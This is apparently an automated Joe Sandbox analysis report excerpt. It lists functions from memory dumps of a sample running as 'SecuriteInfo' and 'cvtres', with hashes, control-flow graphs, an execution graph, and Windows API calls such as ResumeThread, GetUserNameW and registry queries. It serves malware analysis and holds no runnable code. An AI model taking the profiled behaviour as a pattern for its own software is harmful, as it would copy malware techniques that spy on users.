                                                                          • Instruction ID: e81e1caf5db218108e212f1ad8c320d298e2a44c6c7a797e87f0dda0bc09311c
                                                                          • Opcode Fuzzy Hash: 7be8c25c3e5d3ab362bdde3048250e064c52f431337b973918eea4dd8cebe692
                                                                          • Instruction Fuzzy Hash: 313179B5D012589FCB10CFA9D984ADEFBF1BB49314F24902AE814B7310D378AA49CF64
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 246 a5ce70-a5cefe ResumeThread 247 a5cf07-a5cf35 246->247 248 a5cf00-a5cf06 246->248 248->247
                                                                          APIs
                                                                          • ResumeThread.KERNELBASE(?), ref: 00A5CEEE
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.244790725.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_a50000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: ResumeThread
                                                                          • String ID:
                                                                          • API String ID: 947044025-0
                                                                          • Opcode ID: 78bf3117eb40fa8fab9086f5561b41fa0e15a6d0e3b4133fb6f4afcfa5f616bd
                                                                          • Instruction ID: 6d234c720d2893003bc853e24e846202d2b49dfee5f17ec5061d8e2e86e20be1
                                                                          • Opcode Fuzzy Hash: 78bf3117eb40fa8fab9086f5561b41fa0e15a6d0e3b4133fb6f4afcfa5f616bd
                                                                          • Instruction Fuzzy Hash: 0321A8B9D002589FCB10CFA9D485ADEFBF0BB49324F14905AE815B7310D374A949CFA4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 251 a5ce78-a5cefe ResumeThread 252 a5cf07-a5cf35 251->252 253 a5cf00-a5cf06 251->253 253->252
                                                                          APIs
                                                                          • ResumeThread.KERNELBASE(?), ref: 00A5CEEE
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.244790725.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_a50000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: ResumeThread
                                                                          • String ID:
                                                                          • API String ID: 947044025-0
                                                                          • Opcode ID: 93dfe489c3050a81501d9d165a708a3edf2baaa4bb49ef998672ffc3e817e02d
                                                                          • Instruction ID: 78e855cc8b1535c58b6c3a2805e721d38a2c3d46caa0e2c9eaa6d853b187c917
                                                                          • Opcode Fuzzy Hash: 93dfe489c3050a81501d9d165a708a3edf2baaa4bb49ef998672ffc3e817e02d
                                                                          • Instruction Fuzzy Hash: F12186B9D002189FCB10CFA9D485ADEFBF4BB09324F14906AE814B7310D374A949CFA4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.244790725.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_a50000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: Jm?$Jm?$Jm?
                                                                          • API String ID: 0-2358599551
                                                                          • Opcode ID: 37605095d8a7f7e13954489971fb442601dc215c9a0c837b003170602da64633
                                                                          • Instruction ID: 6dd2f18d4f3f125eeb7dfd64adb83da6d1b51a0a07464ba31a910fdd9ba9cf73
                                                                          • Opcode Fuzzy Hash: 37605095d8a7f7e13954489971fb442601dc215c9a0c837b003170602da64633
                                                                          • Instruction Fuzzy Hash: E541F8B0D0460ADBCB48CFAAC9405EEFBF2BF88311F64C42AC815AB214D7349A45CF95
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.244790725.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_a50000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: Jm?$Jm?$Jm?
                                                                          • API String ID: 0-2358599551
                                                                          • Opcode ID: f105212ab4d601f06682466d8194b029912f57058187cc32107c0e752e47a1a0
                                                                          • Instruction ID: 236ee1f28b2b568970d0b00888f5ab29a4fe7d8889c0ac6536334f47ab6dcfc1
                                                                          • Opcode Fuzzy Hash: f105212ab4d601f06682466d8194b029912f57058187cc32107c0e752e47a1a0
                                                                          • Instruction Fuzzy Hash: 754119B4D0464ADFCB08CFAAC4815AEFBF2BF88314F24C46AC815AB244D3349646CF95
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.244790725.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_a50000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: +1U
                                                                          • API String ID: 0-602314014
                                                                          • Opcode ID: 2401868f5a8ec2385b0d44cc2442cbc8bd43388546a17ebdac6ff1e48d235e2a
                                                                          • Instruction ID: 7248bf461b49259733bf82c3447f9dfe7dbf30d246ba3af3fe76957cfcbb36d5
                                                                          • Opcode Fuzzy Hash: 2401868f5a8ec2385b0d44cc2442cbc8bd43388546a17ebdac6ff1e48d235e2a
                                                                          • Instruction Fuzzy Hash: CD3118B5E11618DBDB08CFBAD98459DFBF2BFC8310F24C52AD809A7214D7309945CB50
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.244790725.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_a50000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: +1U
                                                                          • API String ID: 0-602314014
                                                                          • Opcode ID: e6d50d46779a2c76cda8c8e14d3a84dd15fdf9fb8087647cd5379bf1a1ad325d
                                                                          • Instruction ID: 527c98f8bf6fe9843cf7562fbd78d6552f7f3ec70120f65bbde53991446deb7d
                                                                          • Opcode Fuzzy Hash: e6d50d46779a2c76cda8c8e14d3a84dd15fdf9fb8087647cd5379bf1a1ad325d
                                                                          • Instruction Fuzzy Hash: 43318BB0E006589FDB08CFB6D89469DBBF2BF89300F14C52ED804AB265E7348901CB00
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.244790725.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_a50000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 80246ad600d9c1cd2d0dcfd215e6701a387b19f1c81638dc8c7892dc8b41f6d2
                                                                          • Instruction ID: 7937a0ed7f352e7d01be96ea4d1daf44432cf51832e0b01b66974071b5f0a845
                                                                          • Opcode Fuzzy Hash: 80246ad600d9c1cd2d0dcfd215e6701a387b19f1c81638dc8c7892dc8b41f6d2
                                                                          • Instruction Fuzzy Hash: 2EB169B4E04219DFCF04CFA9D8809AEFBB1BF88305F149519D854EB265C3349A4ADFA5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.244790725.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_a50000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: dd568447c5ff09eb5673277f837a0e40431fd313bf535abc4781ff7927845b7b
                                                                          • Instruction ID: 389b6e6e5ab06032ae9fd5cab87522f66eaee42e01285784203b0b4e6de9522b
                                                                          • Opcode Fuzzy Hash: dd568447c5ff09eb5673277f837a0e40431fd313bf535abc4781ff7927845b7b
                                                                          • Instruction Fuzzy Hash: F1A16CB4E0021ADBCF04CFA9D8819AEFBB1BF88341F149519D855EB264C334994ADFA5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.244790725.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_a50000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 7ede359e34fc5c7d6475c851fc12a39ccaae649a4b10c13f906beaba46cf45d0
                                                                          • Instruction ID: bf325bf467a8f645884c281261adb5f5ec7f7c8c396ace9c144c108275e6e221
                                                                          • Opcode Fuzzy Hash: 7ede359e34fc5c7d6475c851fc12a39ccaae649a4b10c13f906beaba46cf45d0
                                                                          • Instruction Fuzzy Hash: 04715A74E05249CFCB01CFA9D9406EFBBB2FF89301F14806AD805AB655E734994ACF91
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.244790725.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_a50000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: c474281e05c9ade43f64e1da1a26d1ff149fca48a6e59200f47a9df1a10fd98d
                                                                          • Instruction ID: 53b8610cb86a14b63140c111bcde9fde96716aac4b1ff398906a873466614238
                                                                          • Opcode Fuzzy Hash: c474281e05c9ade43f64e1da1a26d1ff149fca48a6e59200f47a9df1a10fd98d
                                                                          • Instruction Fuzzy Hash: 82716A74E05249CFCB10CFA9D4405EFBBB2FB89301F24806AD815AB654E334994ADF91
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.244790725.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_a50000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 8b287ac2816e4ce8f090078e1da37ac5364a263ab2f333686b5ce211b71985a3
                                                                          • Instruction ID: 4d1704b5571a3c62dad2dfb3d4976a6fd4c3f987fa3692ccfd33ecc57ace1eeb
                                                                          • Opcode Fuzzy Hash: 8b287ac2816e4ce8f090078e1da37ac5364a263ab2f333686b5ce211b71985a3
                                                                          • Instruction Fuzzy Hash: 1B810174E11619DFCB04CFA9D48499EFBF1FF88315F24856AE819AB224D730AA85CF50
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.244790725.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_a50000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: b7da4191416096f6979b19f8d9563ec6cdcd29221f338d7cb84a6c89107df096
                                                                          • Instruction ID: 67f22e60383e4d31064883915cf656bf9b121c936a4ae8bc9bd8de0e4dbbc736
                                                                          • Opcode Fuzzy Hash: b7da4191416096f6979b19f8d9563ec6cdcd29221f338d7cb84a6c89107df096
                                                                          • Instruction Fuzzy Hash: F171F234E11619DFCB44CFA9D484A9EFBF1FF88311F24856AE819AB224D734AA45CF50
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.244790725.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_a50000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 32665cf363d79dd77be4f07bdadbf0a9ad70bd1341cc1b2616ffafbf94d9e22b
                                                                          • Instruction ID: b79a86b693f306bf543d8633d07004c891b27f71b08eae76146b1299b35f41b9
                                                                          • Opcode Fuzzy Hash: 32665cf363d79dd77be4f07bdadbf0a9ad70bd1341cc1b2616ffafbf94d9e22b
                                                                          • Instruction Fuzzy Hash: 636149B4E05209CBCB04CFA9D5409EFBBB2FF88301F20902AD915BB614E735994ADF94
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.244790725.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_a50000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: ae612d4ae92792047826f3dfa1b9146e6e38bccceb4f9c509a9f69fa333131bc
                                                                          • Instruction ID: 48e3f37ee79477b7ed841cca4ee9f630adf7d883ecf4cad8b7a0768e4eb6c906
                                                                          • Opcode Fuzzy Hash: ae612d4ae92792047826f3dfa1b9146e6e38bccceb4f9c509a9f69fa333131bc
                                                                          • Instruction Fuzzy Hash: E871C3B4E14609DFCB04CFA9D5809AEFBB2FF88311F24851AD815AB314D334A986CF95
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.244790725.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_a50000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 98b0b3675381d3d8b70f585e2b2ac9b74a654df3abf368a254ab792222dc4a9f
                                                                          • Instruction ID: a93982f6740fdbe4a434a7c7905aae6108ac710cf9a501a75b03e9f0db6b1798
                                                                          • Opcode Fuzzy Hash: 98b0b3675381d3d8b70f585e2b2ac9b74a654df3abf368a254ab792222dc4a9f
                                                                          • Instruction Fuzzy Hash: 8C61D2B4E0460ADFCB04CFA9D5909AEFBB2BF88315F248516D815A7314D334A98ACF95
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.244790725.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_a50000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 49263c5ebd30ba890e4aeb45b1e024510ee1571c240063567ba01c3dc9d25a71
                                                                          • Instruction ID: 6a9dce16ff215f3c79e7b1f0e14cb4487c6b93ca39964df34038f325ff1d1145
                                                                          • Opcode Fuzzy Hash: 49263c5ebd30ba890e4aeb45b1e024510ee1571c240063567ba01c3dc9d25a71
                                                                          • Instruction Fuzzy Hash: 6751B675E056188FDB68CF6AD954ADEBBF2BF89300F14C1AAD81CA7264DB305985CF10
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.244790725.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_a50000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 7556f0c8d0b24c664be36c4c7c3392c31a8f43eda155a4d2aaea4273e88c7e80
                                                                          • Instruction ID: 77dad1520618313b376de14096d821234414f06a42526cf7805f71b5875e2189
                                                                          • Opcode Fuzzy Hash: 7556f0c8d0b24c664be36c4c7c3392c31a8f43eda155a4d2aaea4273e88c7e80
                                                                          • Instruction Fuzzy Hash: 2A4133A1D0D7D54FD706CB769C547CA7FB2AF97341F0980E7C484DA1A3E63809098B62
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.244790725.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_a50000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: a8e621822f8ccdea1734412f965da1a971dc720ad0bb6813e9799a1ec9650e03
                                                                          • Instruction ID: dea19e4cc229b948a3b93f6b78620ee089d528f288381c85668c50910ae02ddf
                                                                          • Opcode Fuzzy Hash: a8e621822f8ccdea1734412f965da1a971dc720ad0bb6813e9799a1ec9650e03
                                                                          • Instruction Fuzzy Hash: B54120A1D1D7C54FD70ACB769C5478A7FB2AF96341F09C0E7C484DB1A3E678090A8B62
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.244790725.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_a50000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 392d652b7e98aa1d0ed7020375e83b3efb2a61fe8d3bcedd29d57fb0727597c4
                                                                          • Instruction ID: 315abc56246d2ccbdca62bfd4bbb37e4a7f3997127896e6748dec6c6f5b6f5cc
                                                                          • Opcode Fuzzy Hash: 392d652b7e98aa1d0ed7020375e83b3efb2a61fe8d3bcedd29d57fb0727597c4
                                                                          • Instruction Fuzzy Hash: A2310B75E01618DBDB08CFAAE941ADEBBF2BFC9311F14C12AE908A7254DB705945CB50
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.244790725.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_a50000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: db689ed6c9ca34dc6aab76ff2c6d77fd66da29619d45f40bdc51b34da4cbd93d
                                                                          • Instruction ID: 1ad55a423fd064666d33f0c3f73cfe6588bcbdf9948c4995b79679fdfbf1f92d
                                                                          • Opcode Fuzzy Hash: db689ed6c9ca34dc6aab76ff2c6d77fd66da29619d45f40bdc51b34da4cbd93d
                                                                          • Instruction Fuzzy Hash: CA11AA71E056199BEB18CFABDC406DEFAF3BFC8301F14C07AD918A6254EB3019468E55
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Execution Graph

                                                                          Execution Coverage:12.6%
                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                          Signature Coverage:15.1%
                                                                          Total number of Nodes:205
                                                                          Total number of Limit Nodes:24
                                                                          execution_graph 45113 9ecc5cc 45114 9ecc5de DisplayExitWindowsWarnings 45113->45114 45116 9ecc9db KiUserExceptionDispatcher 45114->45116 45118 9ecca9b LdrInitializeThunk 45116->45118 45121 9eccbe7 KiUserExceptionDispatcher 45118->45121 45122 9ecd093 45121->45122 45123 9ecd735 45122->45123 45125 9ecd8a1 45122->45125 45127 9ecd381 45122->45127 45124 9ecb2e0 GetUserNameW 45123->45124 45124->45127 45126 9ecb2e0 GetUserNameW 45125->45126 45125->45127 45126->45127 44999 b5e1b0 45000 b5e1cf LdrInitializeThunk 44999->45000 45002 b5e203 45000->45002 45003 6965190 45004 69651f8 CreateWindowExW 45003->45004 45006 69652b4 45004->45006 45007 6966b50 GetCurrentProcess 45008 6966bc3 45007->45008 45009 6966bca GetCurrentThread 45007->45009 45008->45009 45010 6966c07 GetCurrentProcess 45009->45010 45011 6966c00 45009->45011 45012 6966c3d 45010->45012 45011->45010 45013 6966c65 GetCurrentThreadId 45012->45013 45014 6966c96 45013->45014 45128 69616b0 45129 69616df 45128->45129 45132 6960420 45129->45132 45131 6961804 45133 696042b 45132->45133 45136 6963368 45133->45136 45134 6961d4a 45134->45131 45137 6963392 45136->45137 45142 69638d0 45137->45142 45140 6963439 45143 6963410 45142->45143 45144 69638c4 45142->45144 45143->45140 45148 6962f44 45143->45148 45144->45142 45145 696398e 45144->45145 45152 6963e4a 45144->45152 45162 6963e58 45144->45162 45149 69641b0 GetModuleHandleW 45148->45149 45151 6964225 45149->45151 45151->45140 45153 6963e58 45152->45153 45154 6962f44 GetModuleHandleW 45153->45154 45155 6963eb2 45153->45155 45154->45155 45156 6962f44 GetModuleHandleW 45155->45156 45161 696407e 45155->45161 45157 6964003 45156->45157 45158 6962f44 GetModuleHandleW 45157->45158 45157->45161 45159 6964051 45158->45159 45160 6962f44 GetModuleHandleW 45159->45160 45159->45161 45160->45161 45161->45145 45163 6963e6d 45162->45163 45164 6962f44 GetModuleHandleW 45163->45164 45165 6963eb2 45163->45165 45164->45165 45166 6962f44 GetModuleHandleW 45165->45166 45171 696407e 45165->45171 45167 6964003 45166->45167 45168 6962f44 GetModuleHandleW 45167->45168 45167->45171 45169 6964051 45168->45169 45170 6962f44 GetModuleHandleW 45169->45170 45169->45171 45170->45171 45171->45145 45172 696b670 45173 696b684 45172->45173 45176 696b8ba 45173->45176 45174 696b68d 45177 696b8c3 45176->45177 45182 696bab6 45176->45182 45186 696ba9c 45176->45186 45190 696b991 45176->45190 45194 696b9a0 45176->45194 45177->45174 45183 696bac9 45182->45183 45184 696badb 45182->45184 45198 696bd97 45183->45198 45187 696ba4f 45186->45187 45187->45186 45188 696badb 45187->45188 45189 696bd97 2 API calls 45187->45189 45189->45188 45191 696b9e4 45190->45191 45192 696badb 45191->45192 45193 696bd97 2 API calls 45191->45193 45193->45192 45195 696b9e4 45194->45195 45196 696badb 45195->45196 45197 696bd97 2 API calls 45195->45197 45197->45196 45199 696bdb6 45198->45199 45203 696bdf8 45199->45203 45207 696bde8 45199->45207 45200 696bdc6 45200->45184 45204 696be32 45203->45204 45205 696be5c RtlEncodePointer 45204->45205 45206 696be85 45204->45206 45205->45206 45206->45200 45208 696be32 45207->45208 45209 696be5c RtlEncodePointer 45208->45209 45210 696be85 45208->45210 45209->45210 45210->45200 45028 cbd01c 45029 cbd034 45028->45029 45030 cbd08e 45029->45030 45035 6963ca4 45029->45035 45043 6965348 45029->45043 45047 6965338 45029->45047 45051 6967978 45029->45051 45036 6963caf 45035->45036 45037 69679e9 45036->45037 45039 69679d9 45036->45039 45067 6966964 45037->45067 45059 6967b10 45039->45059 45063 6967b00 45039->45063 45040 69679e7 45044 696536e 45043->45044 45045 6963ca4 CallWindowProcW 45044->45045 45046 696538f 45045->45046 45046->45030 45048 6965348 45047->45048 45049 6963ca4 CallWindowProcW 45048->45049 45050 696538f 45049->45050 45050->45030 45052 6967988 45051->45052 45053 69679e9 45052->45053 45055 69679d9 45052->45055 45054 6966964 CallWindowProcW 45053->45054 45056 69679e7 45054->45056 45057 6967b10 CallWindowProcW 45055->45057 45058 6967b00 CallWindowProcW 45055->45058 45057->45056 45058->45056 45061 6967b1e 45059->45061 45060 6966964 CallWindowProcW 45060->45061 45061->45060 45062 6967c0b 45061->45062 45062->45040 45065 6967b05 45063->45065 45064 6966964 CallWindowProcW 45064->45065 45065->45064 45066 6967c0b 45065->45066 45066->45040 45068 696696f 45067->45068 45069 6967cda CallWindowProcW 45068->45069 45070 6967c89 45068->45070 45069->45070 45070->45040 45015 9ec2260 45016 9ec227e 45015->45016 45020 9ec3d76 45016->45020 45024 9ec3d80 45016->45024 45017 9ec22b5 45022 9ec3dd9 LoadLibraryA 45020->45022 45023 9ec3e5c 45022->45023 45025 9ec3dd9 LoadLibraryA 45024->45025 45027 9ec3e5c 45025->45027 45071 9ecc1b1 45072 9ecc1c3 45071->45072 45073 9ecc2ea KiUserExceptionDispatcher 45072->45073 45074 9ecc309 45073->45074 45091 b5e9b0 45074->45091 45096 b5e95f 45074->45096 45075 9ecc37e 45076 9ecc9bc DisplayExitWindowsWarnings 45075->45076 45077 9ecc9db KiUserExceptionDispatcher 45076->45077 45079 9ecca9b LdrInitializeThunk 45077->45079 45082 9eccbe7 KiUserExceptionDispatcher 45079->45082 45083 9ecd093 45082->45083 45084 9ecd735 45083->45084 45086 9ecd8a1 45083->45086 45088 9ecd381 45083->45088 45085 9ecb2e0 GetUserNameW 45084->45085 45085->45088 45086->45088 45102 9ecb2e0 45086->45102 45095 b5e9cf 45091->45095 45092 b5ec39 45092->45075 45094 b5a4c4 RegQueryValueExW 45094->45095 45095->45092 45095->45094 45108 b5a4b8 45095->45108 45097 b5e971 45096->45097 45101 b5e994 45096->45101 45097->45075 45098 b5ec39 45098->45075 45099 b5a4b8 RegOpenKeyExW 45099->45101 45100 b5a4c4 RegQueryValueExW 45100->45101 45101->45098 45101->45099 45101->45100 45103 9ecb2ee 45102->45103 45105 9ecb30e 45102->45105 45103->45088 45104 9ecb2b1 45104->45088 45105->45104 45112 9ec8e0c GetUserNameW 45105->45112 45109 b5ecc8 RegOpenKeyExW 45108->45109 45111 b5ed8e 45109->45111 45211 6966d78 DuplicateHandle 45212 6966e0e 45211->45212 45213 6968f78 45220 6968f95 45213->45220 45214 6968fb3 45227 9ecafbf 45214->45227 45233 9ecafc0 45214->45233 45215 696954b KiUserExceptionDispatcher 45217 6969566 45215->45217 45216 6969007 45216->45215 45216->45217 45222 6969797 45220->45222 45223 69697b3 45222->45223 45239 6969867 45223->45239 45243 6969868 45223->45243 45224 69697c0 45224->45214 45228 9ecafce 45227->45228 45230 9ecafee 45227->45230 45228->45216 45229 9ecb07f 45230->45229 45252 9ec5594 45230->45252 45234 9ecafce 45233->45234 45236 9ecafee 45233->45236 45234->45216 45235 9ecb07f 45236->45235 45237 9ec5594 GetUserNameW 45236->45237 45238 9ecb071 45237->45238 45238->45216 45241 6969883 45239->45241 45240 696995d 45241->45240 45247 696d4c7 45241->45247 45245 6969883 45243->45245 45244 696995d 45245->45244 45246 696d4c7 DrawTextExA 45245->45246 45246->45245 45248 696d4d9 45247->45248 45249 696d4fc 45247->45249 45248->45241 45250 696d5f4 45249->45250 45251 696d5e5 DrawTextExA 45249->45251 45250->45241 45251->45250 45254 9ecb0e0 GetUserNameW 45252->45254 45255 9ecb22d 45254->45255
                                                                          APIs
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 09ECC2EA
                                                                          • DisplayExitWindowsWarnings.USER32 ref: 09ECC9BC
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 09ECCA8D
                                                                          • LdrInitializeThunk.NTDLL ref: 09ECCB7B
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 09ECD077
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.507116356.0000000009EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09EC0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9ec0000_cvtres.jbxd
                                                                          Similarity
                                                                          • API ID: DispatcherExceptionUser$DisplayExitInitializeThunkWarningsWindows
                                                                          • String ID:
                                                                          • API String ID: 4242710221-0
                                                                          • Opcode ID: f9bd5342f8f3cab8822b2a09030047b2181a5ac1aaae6ede88fefb631e8559d6
                                                                          • Instruction ID: 5ffa2d7b0a9f030bb7e229316a915af3c7be97568ea4c4307bba0efef3279fe6
                                                                          • Opcode Fuzzy Hash: f9bd5342f8f3cab8822b2a09030047b2181a5ac1aaae6ede88fefb631e8559d6
                                                                          • Instruction Fuzzy Hash: B1A2F4B4A04268CFCB64DF30D9987ADB7B6BB88305F1085EAD54EA3250DB359E81CF51
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
